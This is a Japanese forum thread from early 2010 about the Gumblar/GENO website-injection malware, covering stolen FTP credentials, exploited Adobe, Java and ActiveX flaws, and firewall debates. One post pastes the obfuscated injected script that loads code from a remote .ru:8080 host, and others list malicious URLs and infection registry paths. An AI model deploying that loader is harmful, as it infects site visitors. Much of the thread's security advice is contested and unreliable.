改ざんの告知にウィルススキャンだけでなく
サイト運営者はFTPパスの変更も加えたほうがいいかもな
JRの時は2週間ぐらい放置してたんだろ
FTPパス盗まれた運営者まだたくさんいると思うぜ
何を今更
>>186 でもの凄く詳しいな、って書いてるけど内容はその程度なのか
トークン認証でよくね?
196 :
188 :2010/01/03(日) 01:42:57
よ〜く見たら、ですね・・・ 防いでくれてるのは CVE-2006-3730 CVE-2007-0038 CVE-2006-4868 CVE-2006-4301 CVE-2008-3008 CVE-2006-0005 CVE-2008-4844 CVE-2009-0901 CVE-2009-0927 「CVE-2009-4324」入って無いじゃん・・・ (´・ω・`) gred AVアクセラレータの方が良いかもしれん
gredなんか論外だが aviraやavastやらでも対応は出来る ファイアウォール程度入れとけ
FWで防げるのに広まってるの?
ファイアウォール入れとけばおかしな通信があるからすぐ分かるね 実際にこの通信がパスワードを流してるかどうかは不明だけど 間違いなくおかしいと気づく
多くの人が無防備ってことだろうな MSEなんか使ってファイアウォールはWin標準なんて人も多かったんじゃないのかな
実際のところサイト運営者以外無害なのか
おまえらサイト運営してるの?
>>187 以外にいる?
報告にもあるとおり Windows起動時のスタートアップに実行ファイルを登録する その実行ファイルが通信する その他システムの改変は今のところ俺は確認してない しかしどんな攻撃でも可能だから注意は必要
>>197 PC Tools(笑)を入れてるよ
v6.0.0.86
Firewallのログを見ておかしな通信を見つけたところでもう遅い その通信を止めてくれてこそ役立ったってことでしょ だいたい警告もないのにFWのログなんて見ます? 実際には大手のサイトのWEB制作会社がFWも入れてないとは 考えられないので、FWは突破されてしまっているんでしょうね
最初の通信で問い合わせがあるだろ まあ使ってるソフトにもよるがそう言うソフトを使えってこと
>>204 知らねえ奴は黙ってろ
君にはこれが適切
>>205 そういうのをセキュリティソフトに対する過信って言うんだよwww
試せば分かること 知らねえ奴は黙ってろ
>>207 書き込み内容からして無知なのは明らかだが
なんでそんな自信ありそうな語り口なんだ
>>208 じゃあ、何を試してどういう結果になったか全部書き出せよ
FWを入れていれば大丈夫みたいないい加減なこと書き込まないでさぁあ
>>210 このスレに全部書いてあるんじゃないか
このスレは色んな人がいるから仕方ないが
まともなこと言っても無知なやつが偉そうな口調で否定するからこまる
>>211 だから、具体的にどこのFWなら、ちゃんと警告を出して
どこのものなら、簡単に突破しているって出してみろよ
初心者スレいけよ
なんだここは、全くの役立たずスレだな 実際にはFWが役に立っているかどうかなんて分からないくせに いい加減なこと書き込むんじゃね〜YO・・・ボケw
お前みたいなやつは何言っても駄目だろ 全部書いてあるって言ってるのに だから自分で試せよ
>>214 質問するならちゃんとした文章で質問してくれ
偉そうな態度で聞かれても誰も答える気は起きない
>>204 君はサイト管理者を過信してるんだよ
サイト管理者なんていい加減なんだろうな
そうでもなければこんな
>>159 こんなに放置されないだろ
>サイト管理者なんていい加減なんだろうな だよな はいりのとこまだ埋め込まれてるしw あと削除してもちゃんと告知してるとこなんてわずかだろ 他の運営者にも広めてちゃんと対策とらせないとまだまだ続くぞこれ
そうだな、アホなサイト管理者はたいてい Avira AntiVir Personal+Comodo Firewall で完璧! これ以上のセキュリティはありませんとか信じ込んでるからなwww
アホなサイト管理者を叩くのはいいが何とかしてもらわないと困るのは俺らだぜw
221 :
186 :2010/01/03(日) 10:31:55
全容が全く掴めていない感じがする。 IBM Tokyo SOC Reportがツールを名指しするなど速い感じがしているけど。
シス管ってなにもできないの?
223 :
名無しさん@お腹いっぱい。 :2010/01/03(日) 17:54:11
それなりの規模になると会社の各PCにパーソナルファイヤウォールを入れないことが多い。 シス管のPCも例外ではない。 会社のシステムでトラブルの原因になるから。 そもそも、ファイヤーウォールが反応したときは、すでにウイルスを埋め込まれていたとき。 ところでウイルスに感染したPC自体ででウイルスがかってにサイト書き換えたりはしないのかな
ローカルに保存されてるHTMLファイルを書き換えるってのは、よくある手法だけど
今回のGumblarの騒ぎをまとめると
最初の感染ルートはadobeの0-dayでこのときにFTPのIDとパスが盗まれる
このときは感染したかはわからずウィルススキャンでも検出できない
発病の第一弾がJR東日本やHONDAのときで12/20ごろ
第二段が12/25ごろ、中小サイトに感染がみられこのスレが立ったころ
第三弾が1/2
>>187 この発病というのがHPの改ざんでGNU GPLが埋め込まれるということ
すでにFTPのIDとパスが盗まれてるので運営者が接続してなくても第三者が改ざんできる
でこのGNU GPLが埋め込まれたHP見てもロシアなどの怪しいサイトに接続しようとするだけで
セキュリティソフトも反応ので実際のところ無害と思われる
こんなところだな
以上、古畑任三郎でした
要は自分が管理するFTPサーバを持たない奴は特別気にすることはないと理解していいのか?
今のところは ただ言われているとおり いつ攻撃が変わるか分からない プログラムを実行できてしまうのでどんな攻撃も可能だから注意
個人用のセキュリティソフトはほとんど役に立たないで・・・FA
そんなことはない
んだんだ 脆弱性突かれているのを防ぎきれるもんではないわな FWもやられてしまうと考えるのが普通
あほ
むしろ無知な人以外にはかなり防御しやすい攻撃
大騒ぎになるマルウェアって単純なやつも多いよな P2Pで流行った情報流出みたいにファイアウォールだけで防げるのも多い ファイルを実行しちゃう時点で駄目だけど
FTPアカウントを攻撃者に送る通信って、何番のポートで行われる? これが80番や443番とかじゃなければ、アウトバウンド通信の制御をしてれば ある程度防げそう。
だから制御なんて考えなくてもポップアップされるって あくまでも今のところな
防げれない。
>>234 単純だからアンチウイルスも検出しにくいって言うのもあるね
脆弱性を突かれしまったらアンチウイルスもFWも全くの無力 ここの連中どんだけ呑気なんだよwww
しつけえな
悔しいから嘘まき散らしてるんだろ べつに争ってるわけじぇねえんだからやめろよ
脆弱性突かれてもFW入れていれば情報は漏れない・・・ぷぷぷ 嘘の情報流すのはよせよ
FW云々は 事前に感染を防げるかと 感染後の被害を防げるかで 話が噛み合ってない気がする
要は0-dayをどうやって防ぐかってことだろ Adobe Reader使わなきゃいいんじゃね
>>243 話はかみ合ってないが
漏れてないと思うね
>>244 もちろん脆弱性をふさぐのは基本だけどね
たとえ脆弱性残したままだったとしても
FWがあればこの攻撃に気づくってだけの話
誰もFWで感染が防げるとか言ってない 一人勘違いしてるみたいだが 同じような人がいるかも知れないから勘違いしないようにね
実際は性能の良いHIPSがあるFWなら防げるけどね
>>242 こいつはなんにも分かってない
脆弱性も分かってない
snortとかに検知ルールがりがり書けばええねん
adobeなんで0DAY長期間放置してるんだ?
adobeに関してははっきりと告知すべきだよな ほとんどの人は知らないんじゃないか
データ抜いて外部に流すタイプならいいけど システムやファイル破壊するタイプとか出たら FWじゃどうしようも無いからなぁ
>>252 お前だけだそんなこと思ってるやつ
自分で情強とか思ってるだろ
>>252 FlashPlayer更新してない人も世間的に結構居るんでね?
どこそこの動画サイトで不具合出るから古いのに戻したとかも居そう
>>256 お前だけだそんなこと思ってるやつ
自分で情強とか思ってるだろ
>>255 そんなこと思うわけねえだろ
頭大丈夫かよ
情報が行き届いてないから感染するんだろ
馬鹿め
>>260 なんだよ情強って?
日本語で書いてくれよ
悔しくても荒らすなよ だいたいなんでそんなに悔しいがるんだよ 勘違いしてるんじゃないか
>>254 かわいそうに悔しくても荒らすなよ
だいたいなんでそんなに悔しいがるんだよ www
ファイアウォールやアンチウイルスの設定書き換えちゃったりは無いの?
>>266 今のところ無許可で書き換えはないと思う
最近のは保護機能があるのも多いしね
http://oshiete1.goo.ne.jp/qa4982913.html 自分も初期のGENOウイルスでカスペルスキーで感染しました。
良くHIPSやプロアクティブの事を言われる方を見受けますが実際は
GENOウイルスには全く役に立ちませんでした、
そのGENOで4月末から5月初旬まで非常に困った経験者です。
初期のものはカスペルスキーでも反応はするのですが阻止できませんでした。
前バージョンの7.0をWin2000で使っていましたが、アドビリーダーの5と9を
両方混在させていたのが失敗でした。
IE6、ファイヤーフォックス3でのグーグルツールバーに細工をしてしまい、
何を検索しても、海外の謎の黒バックに青文字のサイトが表示されてしまいました。
次に出たバージョンでは、なにを検索しても404Not Foundと表示されて、
(404にも色々なバージョンがありました。)実は表示自体がウソで他のサイトに
さらにアクセスさせようとしていました。何かの送信が止まらない、ネットワークの
切断出来ない。IPアドレスの解放と再収得が出来ない。なんだこれは。といった
状態で、ブチ。とLANケーブルを引っこ抜きました。
ていうかこれもうGENOと呼ぶには違うんじゃね JREって呼ぼうぜw
>>243 実際
>>159 で試したところ
FWで最初に確認できるアクセス以前での情報流出は確認できない
あくまでもそのサイトでってことだけどね
272 :
名無しさん@お腹いっぱい。 :2010/01/04(月) 03:19:13
矢印のアイコン出て固まる感じ?なら、そうだよ。
カーソルは動くんです でも背景が真っ暗で、下のスタートのバー?所が真っ白になってます。 真っ白な所に合わせると、矢印から砂時計になります。 この画面から何も操作できないです。 どうすれば復旧できますか? 甘えかも知れませんが、教えていただけるとありがたいです。
275 :
名無しさん@お腹いっぱい。 :2010/01/04(月) 06:20:38
>>268 >自分も初期のGENOウイルスでカスペルスキーで感染しました。
>良くHIPSやプロアクティブの事を言われる方を見受けますが
>実際はGENOウイルスには全く役に立ちませんでした、
カスペルスキーの無力ぶりにワロタwww
たかが個人向けの有料あるいは乞食版FWのログを見て無理やり 安心しようとしているところが笑えるスレですね 回避されてるんじゃぁあって思わないのかね でなきゃこんだけ広がるのはおかしいでしょ
>>276 こういうスレ見てる奴はまあいいんだよ
問題なのはPCに使われてる(笑)一般人
GumblarとかGENOとか知ってる?て聞いても「なにそれ」で終わる
もちろんセキュリティソフトなんて入れてないし、入れようともしない
家電感覚でPC買ってる奴はこんなんばっかりだな
>>276 ほんとしつこいね
その程度の人はお前だけだよ
>>278 ほんとしつこいね
その程度の人はお前だけだよ
しつこい阿呆のために説明すると 脆弱性を利用してpdfupd.exeがダウンロードされ実行される トロイ本体が解凍され実行される ここで通信が行われるからすぐ分かるって話なんだよ 異変に気づけば何らかの対処ができるだろうってこと
それでも分からないなら自分で試せ これでおしまいにしてくれよ
よほど悔しかったみたいだなw
>>281 で、どこのFWなら分かって、どこのFWなら分からないの?
外向きの通信が発生したとき分かるようなソフトならどれでも良いだろ 分からないFWは外向き通信を監視しないやつやそう設定してる場合 具体的にと言うなら俺はOutpostを使ってる もちろんその他のソフトでも問題ない
アウポなら大丈夫かもしれんけど、そんなもん普通使ってないから
海外からのFTP接続を拒否れば書き変えは不可能ってことでOK?
そんな設定レン鯖で出来るんか?
普通のレン鯖じゃ無理だろうね
>>274 >>4 テンプレ見てないんじゃ甘えだろ
感染前のレジストリに戻せば直るかもな
年末に感染サイト踏んで、今日までPCオフで様子見。ようやくFTP起動させてサイトのデータDL 数分待って自サイトソース確認するも改ざん現れず 何故生き残ったのか、自分でも分からん XP(昨年11月以降未うp立て)、IE6(ジャバスクオン) adobeリーダーのジャバスクは切ってあったが、これが命綱だったのか?
年末にadobeらしきアップデートが出てきてPCがクラッシュしたとか言い出したのが社内にいて そいつに教えておいたFTPアカウント全部書きかえられてたわ
陥落サイトを掘ってみた。 tp://kyu-ta●sakura●ne●jp/blog/ tp://kyu-ta●sakura●ne●jp/nekkei080401●mht tp://blog●dtpwiki●jp/dtp/ tp://pcafe●blog3●fc2●com/ tp://blog3●fc2●com/pcafe/ tp://tukimisou●s10●xrea●com/ ※〜〜xrea.comは全滅っぽい気がする tp//lists●sourceforge●jp/mailman/archives/slashdotjp-dev/ tp://www●aoki●ecei●tohoku●ac●jp/topic/RSNA_press_release/HealthImaging_com●mht 妙なとこだけ改竄されてるし
>>296 294じゃないけど、fc2の方にメールを送ろうと思ったら
IDを持っていないとそもそも相手にしてくれないようなので
メールすら送れない・送り先が分からない。
こういうので個人あてにメールを送っても返信が来た試しがない。
>>294 どこもやられてないじゃん。
お前さんのキャッシュに妙な物が追記されるなら、お前さんが感染してるんじゃね。
>>298 確かに仮想機(うぃんXP2)で踏んでみても何も起こらない・・・
Trojan.Injectに感染した
>>294 が居ると聞いて
GNU GPLの8080ですな。
304 :
名無しさん@お腹いっぱい。 :2010/01/04(月) 23:08:20
PDigiiEPG.exeだと!?
305 :
294 :2010/01/04(月) 23:22:08
ザルは仕方ないとしても、語検出もするのかよw
どうやらこのスレは釣り堀化してるな(笑)
アホが釣れた
>>302 に飛んだらNODが反応したんだけど大丈夫かよ
反応したんだから大丈夫だろ モロゾフで急に騒がしくなったな
コードそのまま貼った奴がいるからな
何故毎度毎度ソースの見方も知らないくせに、あほなチェッカーを信用して 騒ぎ立てるバカが発生するのか しかもわざわざセキュ板覗いてる程なのに
今更もう良いよ ずっとその話してるのに
モロゾフ、アウト〜
319 :
名無しさん@お腹いっぱい。 :2010/01/05(火) 01:21:44
こんどはモロゾフか いちおう、MicrosoftのSmartScreenと、ゴーグルのセーフブラウジングとやらに モロゾフ報告したけど、いまだに変化なし
>>314 チェッカーの性能がわかったじゃないかw
無理
>>307 一晩たったが大丈夫そうだ
やっぱReaderのジャバスク切ってたのが効いたらしい。今では大抵のベンダーが検出できるっぽいし、漸く一安心だ
324 :
sage ◆sage/xLnlI :2010/01/05(火) 15:16:29
>>76 踏んじゃった
でもnorton先生が止めてくれた
325 :
名無しさん@お腹いっぱい。 :2010/01/05(火) 16:26:02
何かうちのport2049から某RSSサーバにやたらリクエストが送られてるんだが、このウィルス?
326 :
名無しさん@お腹いっぱい。 :2010/01/05(火) 17:04:33
ブラウザのRSS機能なんじゃね?
そこまでわかっててGeno疑うってどういう知識の偏り方なのか疑問だ
ヤフートップキタ━━━━(゚∀゚)━━━━!!!!
今日の夕刊読売新聞ガンブラー記事一面 ホンダもやられてたのね
331 :
名無しさん@お腹いっぱい。 :2010/01/05(火) 23:02:13
エロサイト徘徊している俺は確実にアウトなんだろうな・・・・・・ AVGフリー、Ad-Aware、spybotしか使っていない俺はどうしたらいいのでしょうか?
AVGフリーでも反応するぞ
精度は決して高くはないがフリーならまだavastの方がいいぞ
蔓延具合やばいな 次は辻ブログか どこまで感染が広まるやら
win.jpgって63バイトなんだけど、 これで感染させることができるの?
エスパーさんは先程お眠りになられました
嘘言うなよ 分からないなら黙ってろ
/*GNU GPL*/のスクリプト解読してみたけどさ 解読して出てきたURL先のものをjavascriptだぞと というのは記述してるわけ で今のウィルスってjavascriptで読み込ませたとしても 悪さするプログラムって実行できるわけ? そもそも勝手なプログラムの実行はvistaだと防げるわけだし やっぱりアドビの0-dayでアップデートに紛れ込んで FTPを盗むプログラムを実行したと思われる だから今のところ/*GNU GPL*/のスクリプト読んでも無害なんじゃね 詳しい人どう思う?
>>334 頭のjsがやられてるからハロプロ全体のような希ガス
tp://knnn4321●chips●jp/js/prototype●js
↓
/*GNU GPL*/ try{window.onload
>悪さするプログラムって実行できるわけ? それが出来ちゃう脆弱性を利用してるわけ vistaでも実行は可能だがUACオンだとスタートアップに登録可能かどうかは知らない
それに例えスタートアップに登録できなくても 実行できちゃえば 再起動までは攻撃は有効だと思う
>>339 というか基本的なことを分かってない
このスレ読んだだけでももう少し分かるだろ
>>339 何度も言われていると思うが
モロゾフのやつは
Microsoft Video ActiveX コントロールの脆弱性
Adobe Reader/Acrobatの脆弱性
Sun Javaの脆弱性
の三つの脆弱性のどれかが使われる
つまり/*GNU GPL*/を読み込むと Microsoft Video ActiveX コントロールの脆弱性 Adobe Reader/Acrobatの脆弱性 Sun Javaの脆弱性 このどれかをついてプログラムが実行されちゃうってこと?
そういうこと
347 :
名無しさん@お腹いっぱい。 :2010/01/06(水) 05:27:59
>>335 ,337
win.jpgは脆弱性を突いてクラッシュさせるのが役目で、そいつだけじゃ感染しない。
そいつを読み込ませるJavaScript側でshellコードを生成し、メモリー内にまき散らしておいて
クラッシュ -> shellコード実行 -> ウイルス本体召喚 -> ざまあ!
ってかさ、AVG、Avast、MSEssentialsって入れると互いに競合しないの? 一時のAd-AwareとSpyBotみたいに ウイルスソフトって入れまくってもいいの?
俺AVGツールバーってのインストールしてるんだけど、これの安全性:完全ってサイト使ってれば大丈夫なんだろうか? 今回のGumblarってXXSだろうけど、となるとツールバーに危険と表示される間もなくホンダなどのサイトでは安全性:完全ってなるんだろうか? ホンダとか感染したサイト行く勇気は無いんですが、このツールバーでGumblarを予防できるものなんでしょうか? もし出来なきゃこのツールバーなんの意味があるのかなと思ったりもしますが・・・
Java Runtime Environmentて別に使わなかったらアンインストールしたほうほうが無難?
昨日深夜に adsrevenue-net.king.com.newgrounds-com.themobilewindow●ru:8080/pics/win.jpg からの侵入をノートンが遮断したログが残ってるんですけどこれってなに? 2chを閲覧してたら誘導されたってことかな?
今のところ個人のサイトやブログでは見つかってないんだね。 自分のブログも一応、確認しよう・・・
>354 twintailが HTTP MS MPEG2TuneRequestControl ActiveX BO 2 をと書いてあったので 2chの閲覧が原因かと思ったのですがね。
2日前に踏んだのを、TELNETで入って解析してみたら sciencedirect-com.lequipe.fr.gamestop-com.superore●ru:8080/verycd.com/verycd.com/google.com/zaobao.com/rakuten.co.jp/ を経由して ks369871●kimsufi●com:8080 から.jsファイルをダウンロードしようとしていた。だた、このファイルがダウンロードできなかったので助かったようだ。
pdfはレポートとかで使うからなー消したいのに消せないもどかしさ
>>352 そのURLはこのスレの76で直リンされてて
俺の場合、専ブラで画像を自動サムネイルするようにしてるので
専ブラがアクセスしたらAvastのネットワークシールドが遮断した
>>358 76を見ただけでノートンが遮断しました。
原因が解ってほっとしました。 有り難うございます。
>>356 507 名前:名無しさん@お腹いっぱい。 投稿日:2010/01/05(火) 00:45:49 ID:zAbuPfRw0
砂箱に入れたFirefoxからFirebugで色々見てみたけど
呼び出される本体のjsファイルがNot foundで発火しないね
508 名前:名無しさん@お腹いっぱい。 投稿日:2010/01/05(火) 00:55:20 ID:qZhWCv8d0
アクセス制御で2回目以降は404を装う。
509 名前:名無しさん@お腹いっぱい。 投稿日:2010/01/05(火) 01:13:20 ID:zAbuPfRw0
串さしてやったら死んだわ・・・
やばいな
76の攻撃側のアドレスって侵入を試みる度に変わるねえ。
>>361 gumblarの頃からそういうアクセス制御は入ってるよ。
gumblar.xでは2段構成のうちリダイレクト先(ウイルスばら撒き側)は
陥落サイト群の中からPHPが動作しているサイトが選別されていた。
gumblarに犯されている情報の、最新のサイト名(リンクは要らないです)誰か教えてくれませんか?
対策ソフトを集めてマルウェアの性能テストをしている者です。 PC雑誌の熟読には自信があります。 >通称GENOウイルスに強いかどうか、 ええ、強い方ですけど。 基本的にGENOだろうと何だろうと今はもう何らかの悪意を持つプログラムや スクリプトを総称してマルウェアと呼んでいます。昔からの名残で説明の便宜上 使うとかその程度の意味しかないです。 私のこれまでの経験から言うとすれば、Kaspersky Internet Security 2010が最もおすすめです。 2010ではBehavior BlockerやHIPSに加えて仮想実行スペースも搭載されたのでGumblar (日本の通称ではGENOウイルス)パターンでもバッチリ防げます。
釣り針でかすぎるぞw
368 :
名無しさん@お腹いっぱい。 :2010/01/06(水) 14:48:07
Heur.Win32.Generic.v て言うウイルスが2回も・・・・
大規模流行は大手どこならどこも対応するからどれでも一緒だよ。
「拡張子ではなく、内容によってファイルを開く」という設定がIEでは標準有効だからなぁ・・・
変えればいいだけ
なにまた火狐野郎がなんかいっちゃてんのか
あたいはopera使いちゃん!
375 :
名無しさん@お腹いっぱい。 :2010/01/06(水) 18:17:46
VirtuaBoxにインストールしたWindows XP SP3でwin.jpgを踏んだら いつの間にか悪名高いSecurity Toolがインストールされてたw もう少し遊んでみよう
>>364 avast!はコード自体をwebシールドで弾くから無問題。
Firefox更新きたな
しらん
380 :
名無しさん@お腹いっぱい。 :2010/01/06(水) 19:54:30
<script> /*GNU GPL*/ try{window.onload = function(){var U26gcel3nnek = document.createElement('s@$$&c)$&r$i#(p#$!t!!('.replace(/@|\)|\!|\(|\^|\$|&|#/ig, '')); var Zavq7z4z78k = 'Imrp1rhevfo'; U26gcel3nnek.setAttribute('type', 't(^$e&@&x!!$t!@&/)j((a)v&&a@(^s(!c((r!i$!p!$t!(#'.replace(/\^|#|&|\!|\(|\$|\)|@/ig, '')); U26gcel3nnek.setAttribute('src', 'h())&t)t$$p@#:)^$)/((^/!$#g!o(&&u^^^g!$o?u!-$&c!)!o)^$$m)@!^.$(#n&)$i #(n^#^g@.&@c&$#o@m(.)a###!c#(e!$$(r$$-^#c!@o)@!$m@.$^s)(u!@p$$e@r@(a(g(@^u)$&)!i#d!e&!!#.!@^r(^u^:) #8&^#&0#(8)^0^/!!#i@$)#n^$@$.&!)!c&!(o((!m$&&/$i#!$n#!).)$@c#(^o@!$&m(@/@$g@o))o^&g@&l!#e!.^)c))o@ m#&@/$^#v#)i!)#d!^@e&)$)o@)!@@s#z$(.?^c@!$o!m(^^/@b^(&e#!@&s@((t)#$@#t&^)^u&b!(e^)c$^#l!@)i$)&!$p) @s!$^$(.&$c@&)@o)!$m(^#&/('.replace(/\!|@|#|\$|\(|&|\^|\)/ig, '')); U26gcel3nnek.setAttribute('defer', 'd!$@$e@f!!(&(e^r@)'.replace(/@|\(|\$|#|\!|\)|\^|&/ig, '')); U26gcel3nnek.setAttribute('id', 'M$e!$7#!)r#!$l?@^9()!(#t$!^9&q#)@$$b&&^!3&@)'.replace(/\^|\)|@|&|\$|\!|\(|#/ig, '')); document.body.appendChild(U26gcel3nnek);}} catch(Lpmpa57y1j) {} </script> <!--86fa61201e3ca3a075145a1d33d3c209-->
381 :
sage ◆sage/xLnlI :2010/01/06(水) 19:59:26
思いっきり踏みました
382 :
sage ◆sage/xLnlI :2010/01/06(水) 20:05:47
MSに電話白や
>>360 これって、もしかして同じLANから見たら、一人目しか感染しないってことか?
385 :
名無しさん@お腹いっぱい。 :2010/01/06(水) 20:18:27
>>382 んなもんないからとっととOSいれなおせ
387 :
sage ◆sage/xLnlI :2010/01/06(水) 21:24:34
>>386 えっ
いまノートン先生が0v3exclv.exeを削除してくれました
やっぱりUACはスルーするのか
>>387 firefoxにはnoscript入れてなかったの?
それとも入れた結果がこれだyoってこと?
UACスルーってマジかよ、何のための暗転だよ
393 :
名無しさん@お腹いっぱい。 :2010/01/06(水) 23:19:53
海外ではあんま騒いでないよな なんだこの差は
>>394 "セキュリティツール"の画面が出てくるって騒ぎになっていると聞いたような。
具体的な場所は分からないけど。
これ、もしかして制限ユーザだと全く感染しない?
>>395 Security Toolな。
これも改ざんされたサイトを閲覧して、脆弱性を利用して感染するらしい
サイト www.spacecraft.co.jp/home.html の調査結果 検出されたウイルス(ワーム、スパイウエア) Trojan-Downloader.JS.Agent.ewh
>>398 そのウィルスはつい最近まで、GDATAの誤検出だとずっと思ってた。
↓↓↓
h
ttps://www ●global2j-education●com/contact
↑↑↑
httpsが、、、
世界中のHTMLのソースコードを検索できたら回避できるのにね グーグル辺りがやってくれないかな・・・・
FTPがやられるんだからhttpsとか関係ないよ
32 名前: すり鉢(アラバマ州) 投稿日: 2010/01/07(木) 00:45:39.79 ID:RXPRsCkB p://www●spacecraft●co●jp/home●html スペースクラフトグループ 神田うの、黒谷友香、栗山千明、岩田さゆり、青山倫子、宇浦冴香、等が所属。 ガンブラーキタ━(゚∀゚)━!!
私は対策ソフトを集めてマルウェアの性能テストなどをしています。 PC雑誌の熟読には自信があります。 あなた方には高度な話になりますが、最近のクラッカーは対策ソフトの 利用を予め想定していて、これを回避するようにいろいろ画策してきます。 今ではアンチウイルスの回避なんて簡単にできるようになっていますし、 Personal Firewallもバイパスできる場合も結構あります。 ここの閲覧者の方々も含めて申しますけど、ここ最近は対策ソフト 回避技術が非常に進歩してきましたので、機関系テストでNo.1の ソフトだからとかそんな簡単な話ではなくなっています。 私の豊富なテストと経験からすればKaspersky Internet Security 2010が最もおすすめです。 2010ではBehavior BlockerやHIPSに加えて仮想実行スペースも搭載されたのでGumblar (日本の通称ではGENOウイルス)パターンでもバッチリ防げます。
コピペ乙
年明けにgoonetの輸入車ページ見てたらなんか変になったけど大丈夫だったのかな…
民主党サイトが年末から年始にかけて改ざん - 政治的意図なし カゴヤのホスティングサーバが不正アクセス被害 - ウェブアプリの脆弱性狙われる 関連7サイトが改ざん被害、閲覧でウイルス感染のおそれ - 出版文化社 通販サイトなど運営する3サイトで改ざんが発生 - 岐阜の恵那バッテリー電装
408 :
名無しさん@お腹いっぱい。 :2010/01/07(木) 01:59:19
詳しくない者だが、経緯を書いておく。 年末にあるサイトを見たら、瞬間的にいくつ窓が開き、Acrobat6が自動起動。 そして固まる。PCを強制再起動。 再起動すると、Antivirに反応するファイルがゾロゾロすごい数でてくる。名前 はまともらしいが、ほぼすべて削除。いくつかもらしたかも。 次の日に再起動しても、また反応ファイルがぞろぞろ。このあたりで難しいウイルス かも?と気がついて、とにかく反応するものをすべて削除。TV番組表自動取得 のためのものも、削除してしまった。 その後、スキャンにひっかかるものはテンポラリファイルにある実行ファイル だけになる。簡単に削除。しかし、siszyd32.exeについては「ファイルが開けない」 という警告のみでる。一旦安心。
409 :
名無しさん@お腹いっぱい。 :2010/01/07(木) 02:00:40
Spybotでも、siszyd32.exeはひっかからず。WEBで調べてヤバそうなものだと 判明するが、ファイル本体がどうしても見えない。隠しファイルを表示にしても、 見えない。ただ、存在が指摘されたフォルダで、 siszyd32.exeフォルダを作成するとできないことから、やはり存在する ことが判明。 ググッてみたけれど、有効策が見つからず。レジストリの中に見つからず、 カスペのフリーツールはデータベースが壊れていると出てつかえなかった。 また、何もしていなくてもCPU使用率が50%になっていることに気がついた。 不審なプログラム、プロセスは自分の知識ではみあたらず。 今日になって、いろいろ削除方法を探してみたところ、セーフモードで起動 するとうまく削除できるらしいので、試してみた。すると、 \プログラム\スタートアップ\siszyd32.exe が何もしなくてもはっきり 見えていたので、削除して再起動したところ、CPU使用率が5%くらいに 落ちた。多分、解決。 今は、siszyd32.exeがCPUをあんなに使用して何をしていたのかが気になって いる。サイトの運営はしていないが、どうしたらいいものか・・・。ヤフー とかのパスを変更した方がいいのかな。
>>409 OSのクリーンインストールを薦める
面倒だとは思うが、やっておいたほうが絶対にいいぞ
411 :
名無しさん@お腹いっぱい。 :2010/01/07(木) 02:19:00
>410 ありがとう。でも、忙しくて。XPなんで、クリーンインストール するくらいなら、新しいPCを7で自作しようか検討中。 自分はウイルスやファイアーウォールに詳しくないので、これを機に勉強 しようと思ってます。 今回のウイルスは8,9年くらい前に大流行したウイルスを思い起こさせ ますね。これを機にセキュリーティーが強化されたはずなのに、こんなに あっさり感染するとは・・・。WEBを見ただけで感染というのは問題が ありすぎる。自分の周りはもっとPCに疎い人ばかりなので、明日は職場で 大変だ。
水面下への広がりと応用力を考慮すると、まだ氷山の一角に過ぎず ネット史上最悪のウィルスとなり得る可能性があるな 事の始まりは去年の春辺りだったか そこから、表面上に出てくるまで一気に広がり始めた印象
/*GNU GPL*/ 感染サイトを見る ↓ Adobe Readerを最新版に更新してないと 脆弱性をつかれてウィルス実行される ↓ FTPのID、パスがあれば盗まれる というか盗んで送信するプログラムが常駐される ↓ 盗まれたFTPのID、パスでサイトを改ざん ↓ ループ
GNU GPLに関しては、Adobe Readerを入れてなければ感染は防げるとみていいのかな?
基本、JSは信頼サイト以外は止めてるが・・・大手の有名サイトでも感染する事があるから100%安全じゃないだろうな 未知のセキュリティホールを突かれない事を祈るばかり
> 未知のセキュリティホールを突かれない事を祈るばかり それを考えるとHIPS入れておく方がいいのかね
こんなに多くのサイトがやられるんじゃ 市販のウィルスソフトなんか役に立たないと ばれちゃうなw
ウイルス対策ソフトは検体が無いと対策は取れないからねえ まあ、これは現実世界のウイルスでも同じだけど
UAC→スルー?? ウィルスソフト→定義更新が間に合わない 各ソフトウェアを最新の状態にしておく→現状ではこれが無難 javascriptを無効化する→ブラウジングに支障が出る 頻繁にブラウジングする立場(様々なオンラインショップで購入したりもする)としては若干怖い
バックアップとれば万が一の時はクリーンインスコで済むから現実のウィルスほど 脅威には感じないけどね(仕事関連は別だけど)
専ブラで2chだけを見るネット生活を送るのがベストか
ガンプラでジオマラでも作ってろチンカスw
うちはLive2chだからIEエンジンを使うけどIE自体を凍結しているから実害はないかな
9999999円あなたはどしますか? tp://117117●fc2web●com/ これはGNU GPLぐっじょぶw・・で宜しいのかな?
感染すると以下の二つが登録される C:\Documents and Settings\ユーザー名\スタート メニュー\プログラム\siszyd32.exe [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] "sysgif32"="C:\\WINDOWS\\TEMP\\~TMD.tmp"
そこは固定じゃない。バイナリはコロコロ変わる。
ころころなんて変わらないよ
モロゾフなどが感染した今流行のやつはそれだろ 新たな違う攻撃なら変わるだろうけど コロコロ変わったところは確認してない
GENOの頃はVistaは安全だったのに、もうVistaでも関係ないんだな。
モロゾフのタイプは
>>427 であってる
ころころ変わるのは別物
感染しているのはupdateを怠ってる人達だがね
updateを怠ってるなんて出来るの? 終了時に強制的にupdateされない?
flashとかがか 今の段階でそんなこといってたらそら引っかかるわ
>>384 俺もそれ知りたい。
月曜の晩、俺のPCでNOD32が8080系を検知したサイトを、奥さんが別PCで見ちゃったの。ウィスルセキュリティーZEROはスルー。
でも、どんなに調べても感染の形跡がないのさ。
その後、各社(Macfee,NOD2,MSE,Kasper)の全スキャンにも引っかからず、netstat -a で見てももどこにもつなぎに行ってない。
Windows XPは Windows Updateで最新状態だったが、Acrobatは8だったのに。
で、
>>356 や
>>360 を見て、もしかしてNOD32は改竄されたHTMLの<script>の文字列パターンや .ru:8080 のサイト名ではなく、
その次の .jsファイルのダウンロードの時点で検知・遮断するのかなと。
すると、次に奥さんが別PCで見ても.jsファイルがNOT FOUNDなら感染しなかったのも合点がいくんだなぁ。
いずれにしても早く、明確な感染確認の方法が出てくれればありがたい。
いっそFFFTPをインストールして、自前サイトのID/PWでもセットしておくかなw
Spybot、Ad-Aware、Avast、MSEssentialsの4つをインストール(常駐)+MSの悪意のある〜を使ってますが、こういうフリーのソフトで固めてもGumblarは防げないのでしょうか?
だから穴の前のついたてを選んでないで さっさと穴埋めとけ
